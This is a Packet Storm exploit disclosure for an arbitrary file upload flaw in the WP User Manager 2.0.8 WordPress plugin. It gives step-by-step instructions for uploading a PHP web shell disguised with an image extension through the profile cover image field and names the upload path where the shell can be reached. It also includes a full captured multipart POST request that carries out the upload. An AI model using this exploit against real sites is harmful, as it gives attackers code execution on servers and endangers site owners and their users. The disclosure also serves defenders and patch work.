WordPress WP User Manager 2.0.8 Shell Upload

2019-02-05T00:00:00
ID PACKETSTORM:151534
Type packetstorm
Reporter Mr Winst0n
Modified 2019-02-05T00:00:00

Description

                                        
                                            `# Exploit Title: Wordpress Plugin WP User Manager 2.0.8 - Arbitrary file upload  
# Exploit Author: Mr Winst0n  
# Author E-mail: manamtabeshekan[@]gmail[.]com  
# Discovery Date: February 5, 2019  
# Vendor Homepage: https://wpusermanager.com  
# Software Link : https://wordpress.org/plugins/wp-user-manager/  
# Tested Version: 2.0.8  
# Tested on: Kali linux, Windows 8.1 / Wordpress 4.9.8  
  
# Note: Free edition is vulnerable, other versions may also be affected.  
  
# PoC:  
# 1.- Login to site and go to your profile setting  
# 2.- In profile cover image section, you can upload your shell by adding image extensions to end of your shell. (ex: SHELL.php.png)  
# 3.- Click on "Update Profile"  
# You can see your shell in /wp-content/uploads/wp-user-manager-uploads/[year]/[month]/SHELL.php.png   
  
  
# PoC header:  
  
POST /wordpress/?page_id=214&updated=success HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/wordpress/?page_id=214&updated=success  
Content-Type: multipart/form-data; boundary=---------------------------1794372498243154061698264842  
Content-Length: 2142  
Cookie: wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=root%7C1547649639%7CwJOz9suousR6JF7I0vqY76uoTRfAwA7bE0diqvzfxjP%7C8fbaaff802e0459d5aa4a1f581eb78053d63c4d024ef4d6048eb7c7c952b8ff5; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26post_dfw%3Doff; wp-settings-time-1=1547476851  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="user_cover"; filename="SHELL.php.jpeg"  
Content-Type: image/jpeg  
  
{{"SHELL CONTENT"}}  
  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="user_email"  
  
{{"Email"}}  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="user_firstname"  
  
  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="user_lastname"  
  
  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="user_nickname"  
  
root  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="user_displayname"  
  
display_nickname  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="user_website"  
  
  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="user_description"  
  
  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="wpum_form"  
  
profile  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="step"  
  
0  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="account_update_nonce"  
  
df63baa04c  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="_wp_http_referer"  
  
/wordpress/?page_id=214&updated=success  
-----------------------------1794372498243154061698264842  
Content-Disposition: form-data; name="submit_account"  
  
Update profile  
-----------------------------1794372498243154061698264842--  
  
`